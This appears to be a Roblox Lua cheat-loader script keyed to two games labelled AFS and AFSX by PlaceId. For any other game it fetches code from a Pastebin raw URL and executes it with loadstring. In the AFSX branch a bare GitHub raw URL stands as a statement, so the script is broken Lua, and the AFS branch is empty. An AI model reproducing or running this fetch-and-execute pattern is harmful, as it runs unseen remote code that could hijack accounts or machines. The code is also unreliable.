local gamePlaceIds = {
    4042427666,   -- AFS
    11545598432,  -- AFSX
}

local currentPlaceId = game.PlaceId

if table.find(gamePlaceIds, currentPlaceId) then
    if currentPlaceId == 4042427666 then
        -- Code for PlaceId 4042427666 (AFS)
        
    elseif currentPlaceId == 11545598432 then
        https://raw.githubusercontent.com/Redwayzero/AE-Afsx-/main/AE%20Afsx
        
    -- Add more elseif blocks for other game PlaceIds here
    
    end
else
loadstring(game:HttpGet(('https://pastebin.com/raw/NiEmSuNH')))() 
end
